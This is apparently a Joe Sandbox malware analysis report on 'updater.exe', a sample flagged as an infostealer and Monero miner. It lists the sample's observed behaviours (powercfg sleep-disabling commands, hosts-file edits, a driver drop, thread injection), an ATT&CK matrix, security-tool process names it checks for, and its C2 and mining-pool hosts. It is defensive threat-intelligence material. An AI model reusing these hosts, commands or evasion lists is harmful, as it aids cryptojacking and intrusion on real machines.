                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Modifies power options to not sleep / hibernate
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                Modifies the hosts file
                Source: C:\Users\user\Desktop\updater.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MCSHIELD.exe
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avguard.exe
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cfp.exe
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msmpeng.exe
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aswupdsv.exe
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVENGINE.exe
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avkwctl.exe
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsav32.exe
                Source: conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZLCLIENT.exe
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ashServ.exe
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EC75000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2716686455.000002862EC57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249975523.000002862F604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ashwebsv.exe
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xcommsvr.exe
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Procmon.exe
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsdfwd.exe
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgemc.exe

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                Windows Management Instrumentation                		11
                Windows Service                		11
                Windows Service                		1
                Masquerading                		OS Credential Dumping221
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Service Execution                		1
                DLL Side-Loading                		111
                Process Injection                		1
                File and Directory Permissions Modification                		LSASS Memory1
                Process Discovery                		Remote Desktop ProtocolData from Removable Media11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Disable or Modify Tools                		Security Account Manager31
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook31
                Virtualization/Sandbox Evasion                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture3
                Ingress Tool Transfer                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
                Process Injection                		LSA Secrets1
                Remote System Discovery                		SSHKeylogging4
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Obfuscated Files or Information                		Cached Domain Credentials12
                System Information Discovery                		VNCGUI Input Capture5
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                File Deletion                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1478400 Sample: updater.exe Startdate: 22/07/2024 Architecture: WINDOWS Score: 100 64 pastebin.com 2->64 66 pool.supportxmr.com 2->66 68 3 other IPs or domains 2->68 76 Malicious sample detected (through community Yara rule) 2->76 78 Antivirus detection for URL or domain 2->78 80 Multi AV Scanner detection for submitted file 2->80 84 6 other signatures 2->84 8 updater.exe 1 2->8         started        12 updater.exe 1 3 2->12         started        14 svchost.exe 2->14         started        signatures3 82 Connects to a pastebin service (likely for C&C) 64->82 process4 file5 52 C:\Windows\Temp\maoxoafwbtki.sys, PE32+ 8->52 dropped 86 Multi AV Scanner detection for dropped file 8->86 88 Modifies the context of a thread in another process (thread injection) 8->88 90 Adds a directory exclusion to Windows Defender 8->90 92 Sample is not signed and drops a device driver 8->92 16 conhost.exe 8->16         started        20 powershell.exe 8->20         started        22 cmd.exe 8->22         started        30 5 other processes 8->30 54 C:\ProgramDatabehaviorgraphoogle\Chrome\updater.exe, PE32+ 12->54 dropped 56 C:\Windows\System32\drivers\etc\hosts, ASCII 12->56 dropped 94 Uses powercfg.exe to modify the power settings 12->94 96 Modifies the hosts file 12->96 98 Modifies power options to not sleep / hibernate 12->98 24 powershell.exe 23 12->24         started        26 cmd.exe 1 12->26         started        28 powercfg.exe 1 12->28         started        32 7 other processes 12->32 signatures6 process7 dnsIp8 58 pastebin.com 104.20.4.235, 443, 49706, 49707 CLOUDFLARENETUS United States 16->58 60 koldiv.ru 77.222.57.251, 49705, 49708, 49723 SWEB-ASRU Russian Federation 16->60 62 2 other IPs or domains 16->62 70 Found strings related to Crypto-Mining 16->70 72 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->72 34 conhost.exe 20->34         started        46 2 other processes 22->46 74 Loading BitLocker PowerShell Module 24->74 36 conhost.exe 24->36         started        38 conhost.exe 26->38         started        40 wusa.exe 26->40         started        42 conhost.exe 28->42         started        48 4 other processes 30->48 44 conhost.exe 32->44         started        50 6 other processes 32->50 signatures9 process10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                updater.exe66%ReversingLabsWin64.Infostealer.Tinba

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\ProgramData\Google\Chrome\updater.exe66%ReversingLabsWin64.Infostealer.Tinba
                C:\Windows\Temp\maoxoafwbtki.sys5%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://pastebin.com/raw/HpN5DV4T0%Avira URL Cloudsafe
                http://koldiv.ru100%Avira URL Cloudmalware
                https://pastebin.com/raw/xhASwz5fX0%Avira URL Cloudsafe
                http://koldiv.ru/api/endpoint.php100%Avira URL Cloudmalware
                http://koldiv.ruCESSOR_REVI0%Avira URL Cloudsafe
                http://koldiv.ru/http://koldiv.ru100%Avira URL Cloudmalware
                https://pastebin.com/raw/xhASwz5f0%Avira URL Cloudsafe
                https://pastebin.com/raw/xhASwz5fRunning0%Avira URL Cloudsafe
                https://xmrig.com/docs/algorithms0%Avira URL Cloudsafe
                https://172.94.1q0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                xmr.2miners.com
                		162.19.139.184
                		truefalse
                  		unknown
                  pool-fr.supportxmr.com
                  		141.94.96.71
                  		truefalse
                    		unknown
                    koldiv.ru
                    		77.222.57.251
                    		truefalse
                      		unknown
                      pastebin.com
                      		104.20.4.235
                      		truetrue
                        		unknown
                        pool.supportxmr.com
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://pastebin.com/raw/xhASwz5ffalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://koldiv.ru/http://koldiv.rufalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://koldiv.ru/api/endpoint.phpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://pastebin.com/raw/HpN5DV4Tfalse
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://pastebin.com/raw/xhASwz5fRunningconhost.exe, 00000027.00000003.2414280384.000002862EC60000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://koldiv.ruCESSOR_REVIconhost.exe, 00000027.00000003.2414325891.000002862EC26000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://pastebin.com/raw/xhASwz5fXconhost.exe, 00000027.00000003.2152302371.000002862EC26000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000003.2414325891.000002862EC26000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://172.94.1qconhost.exe, 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://koldiv.ruconhost.exe, 00000027.00000003.2414280384.000002862EC60000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://xmrig.com/docs/algorithmsconhost.exe, 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          141.94.96.195
                          		unknownGermany
                          		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                          104.20.4.235
                          		pastebin.comUnited States
                          		13335CLOUDFLARENETUStrue
                          162.19.139.184
                          		xmr.2miners.comUnited States
                          		209CENTURYLINK-US-LEGACY-QWESTUSfalse
                          77.222.57.251
                          		koldiv.ruRussian Federation
                          		44112SWEB-ASRUfalse

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1478400
                          Start date and time:2024-07-22 15:44:08 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 7m 39s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:43
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:updater.exe
                          Detection:MAL
                          Classification:mal100.troj.adwa.spyw.evad.mine.winEXE@59/13@4/4
                          EGA Information:
                          • Successful, ratio: 25%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target conhost.exe, PID 5596 because there are no executed function
                          • Execution Graph export aborted for target updater.exe, PID 1896 because it is empty
                          • Execution Graph export aborted for target updater.exe, PID 6300 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtCreateKey calls found.
                          • VT rate limit hit for: updater.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          09:44:59API Interceptor32x Sleep call for process: powershell.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          141.94.96.195http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                          • pool.supportxmr.com/favicon.ico
                          104.20.4.235envifa.vbsGet hashmaliciousRemcosBrowse
                          • pastebin.com/raw/V9y5Q5vv
                          New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Update on Payment.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          162.19.139.184iCp2Rcgw44.exeGet hashmaliciousXmrigBrowse
                            file.exeGet hashmaliciousXmrigBrowse
                              Krnl.exeGet hashmaliciousXmrigBrowse
                                cybXkFC5nF.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse
                                  Arceus.exeGet hashmaliciousXmrigBrowse
                                    i3LIe5GBgd.exeGet hashmaliciousXmrigBrowse
                                      RA95ALDCS9.exeGet hashmaliciousRedLine, XmrigBrowse
                                        SecuriteInfo.com.Win32.Evo-gen.1231.21474.exeGet hashmaliciousVidar, XmrigBrowse
                                          SecuriteInfo.com.Trojan.DownLoader45.1081.7048.8713.exeGet hashmaliciousXmrigBrowse
                                            RemiTool v2.exeGet hashmaliciousXmrigBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              pastebin.comDeqcE30sLb.exeGet hashmaliciousDCRatBrowse
                                              • 172.67.19.24
                                              Mx0UGSI897.exeGet hashmaliciousDCRatBrowse
                                              • 104.20.3.235
                                              eE1xnwas4F.exeGet hashmaliciousLummaCBrowse
                                              • 104.20.3.235
                                              conhost.exeGet hashmaliciousXmrigBrowse
                                              • 104.20.3.235
                                              SecuriteInfo.com.Win64.Evo-gen.29709.21053.exeGet hashmaliciousUnknownBrowse
                                              • 104.20.3.235
                                              Software1.30.1.exeGet hashmaliciousRedLine, XmrigBrowse
                                              • 172.67.19.24
                                              Loader.exeGet hashmaliciousLummaC, XmrigBrowse
                                              • 104.20.3.235
                                              updater.exeGet hashmaliciousXmrigBrowse
                                              • 172.67.19.24
                                              COMPROVANTE DE PAGAMENTO.ppamGet hashmaliciousRevengeRATBrowse
                                              • 104.20.3.235
                                              sostener.vbsGet hashmaliciousRemcosBrowse
                                              • 172.67.19.24
                                              xmr.2miners.comiCp2Rcgw44.exeGet hashmaliciousXmrigBrowse
                                              • 162.19.139.184
                                              file.exeGet hashmaliciousXmrigBrowse
                                              • 162.19.139.184
                                              Krnl.exeGet hashmaliciousXmrigBrowse
                                              • 162.19.139.184
                                              cybXkFC5nF.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse
                                              • 162.19.139.184
                                              Arceus.exeGet hashmaliciousXmrigBrowse
                                              • 162.19.139.184
                                              i3LIe5GBgd.exeGet hashmaliciousXmrigBrowse
                                              • 162.19.139.184
                                              RA95ALDCS9.exeGet hashmaliciousRedLine, XmrigBrowse
                                              • 162.19.139.184
                                              SecuriteInfo.com.Win32.Evo-gen.1231.21474.exeGet hashmaliciousVidar, XmrigBrowse
                                              • 162.19.139.184
                                              SecuriteInfo.com.Trojan.DownLoader45.1081.7048.8713.exeGet hashmaliciousXmrigBrowse
                                              • 162.19.139.184
                                              RUN.exeGet hashmaliciousBabadedaBrowse
                                              • 162.19.139.184
                                              pool-fr.supportxmr.comxjSglbp263.exeGet hashmaliciousXmrigBrowse
                                              • 141.94.96.71
                                              gwRQinPOHB.exeGet hashmaliciousXmrigBrowse
                                              • 141.94.96.195
                                              FieroHack.exeGet hashmaliciousXmrigBrowse
                                              • 141.94.96.195
                                              FieroHack.exeGet hashmaliciousLummaC, XmrigBrowse
                                              • 141.94.96.195
                                              gVRqUej0ci.exeGet hashmaliciousXmrigBrowse
                                              • 141.94.96.71
                                              h2UFp4aCRq.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                              • 141.94.96.144
                                              setup.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                                              • 141.94.96.71
                                              SecuriteInfo.com.Win32.Evo-gen.18867.15916.exeGet hashmaliciousXmrigBrowse
                                              • 141.94.96.71
                                              http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                                              • 141.94.96.71
                                              http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                                              • 141.94.96.195

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              SWEB-ASRUAbvmEnagz3.exeGet hashmaliciousDCRatBrowse
                                              • 77.222.62.219
                                              ppXCre3i9k.exeGet hashmaliciousDCRatBrowse
                                              • 77.222.57.208
                                              http://hostaruba0.temp.swtest.ru/008997/areautenti/login.phpGet hashmaliciousHTMLPhisherBrowse
                                              • 77.222.57.208
                                              4y2bJd0meT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              • 77.222.62.71
                                              http://fansharf.ruGet hashmaliciousUnknownBrowse
                                              • 77.222.61.25
                                              xdUF3ppIU4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              • 77.222.62.71
                                              GC_Invoice_02052024_docs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 77.222.57.185
                                              STATEMENT_OF_ACCOUNT_xlxs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 77.222.57.185
                                              http://salesrent5.temp.swtest.ru/app/MTTRBDFH/index.php?FGDD=1Get hashmaliciousUnknownBrowse
                                              • 77.222.62.71
                                              cZKS6afo0o.exeGet hashmaliciousDCRatBrowse
                                              • 77.222.40.147
                                              DFNVereinzurFoerderungeinesDeutschenForschungsnetzesehttp://nys-ns.com/Get hashmaliciousUnknownBrowse
                                              • 141.95.124.137
                                              http://nys-ns.com/Get hashmaliciousUnknownBrowse
                                              • 141.95.124.137
                                              ZPPEqPIBy7.elfGet hashmaliciousUnknownBrowse
                                              • 130.133.207.43
                                              D8J2VuFPRL.rtfGet hashmaliciousFormBookBrowse
                                              • 141.95.110.31
                                              Pn0jlaHvxE.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              • 141.99.20.144
                                              1gx339YsKN.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              • 141.88.171.81
                                              faBNhIKHq4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              • 141.89.138.130
                                              ts2d2a5oFa.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              • 141.36.140.1
                                              EKi4eGLprr.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 141.32.20.220
                                              92.249.48.47-skid.ppc-2024-07-20T09_04_20.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 160.45.212.106
                                              CLOUDFLARENETUSATT96885.htmGet hashmaliciousHTMLPhisherBrowse
                                              • 188.114.96.3
                                              https://liceultehnologicrosiajiu.ro/ulin/ulin8ce.htmlGet hashmaliciousCVE-2024-21412Browse
                                              • 104.16.230.132
                                              QVA-8288-9779ZPT.exeGet hashmaliciousUnknownBrowse
                                              • 172.67.182.157
                                              https://trk.klclick3.com/ls/click?upn=u001.F5FUvNp8lGuVBrfF8VWSt-2Befrq4JwHZUrXxYUllvBu6JQLRTleNqoOq9cK2V6H9nF6TE8i5ai18ELwuaCRLRwA-3D-3DeBON_1svWsHF9QtKh6I35BSRfJziCtreSweSmmjNgxUuzWxLFgb12Ddkvv3gPW-2BY7HCV4BtwDYPCgqFm6ezf3LGkFgw-2FasXzQ01tiusM7qj7f7wQzyFpk04U-2BNsOiH-2B6C0IEGGhuBHlH4nFGk5hM1YrilA-2FklNstU7j1vcFJG8iHzTeSRYHOXIpK0cVyPDdeQeDUKiYrTYys-2FJ6BSjWfQuGIzI8V57VImtAPAAkrpuUD31VELoL-2FwLqoqcEcJaE-2B6fpm2wPTZkCul8wgxqc4qQClvNSQEUdlWOW-2BnsmWvhHzUvBgdPRhNpiRMg8ZZ-2BBQBoSFlRkufcGBk8zdT6H-2B-2FULHcbxzCKE71NmfbhvHZ7lmXl2A-3DGet hashmaliciousTycoon2FABrowse
                                              • 104.17.25.14
                                              https://important-invite.ru/invitersvp/Get hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              https://www.google.com.au/url?q=//www.google.co.nz/amp/s/clientdevelopmentserver.com/secure/documentattached.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              Play__Now___Aud_for_matthew.whistler@holcim.com.htmlGet hashmaliciousUnknownBrowse
                                              • 104.21.88.106
                                              https://automarketjobs.com/visionrepartners/Get hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              25bbed456281ea6f37cb6b295ebd0d1764156e797b4f15e0dc1bbcd7342086a9_payload.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              https://kwxciujqil.joseph-mathieu.workers.dev/?lneigvrscbp=Y25wZ2xhbW91ci1idXNpbmVzc0Bjb25kZW5hc3QuY29tGet hashmaliciousUnknownBrowse
                                              • 172.67.135.145
                                              CENTURYLINK-US-LEGACY-QWESTUShttp://ages-dedressmii-pertaminna-resmii.rexz.my.id/Get hashmaliciousUnknownBrowse
                                              • 162.19.58.161
                                              http://reedempayml.ogr.my.id/Get hashmaliciousHTMLPhisherBrowse
                                              • 162.19.58.159
                                              mips.elfGet hashmaliciousMiraiBrowse
                                              • 184.6.30.91
                                              arm.elfGet hashmaliciousMiraiBrowse
                                              • 174.17.126.251
                                              https://5228753.webku.buzz/Get hashmaliciousUnknownBrowse
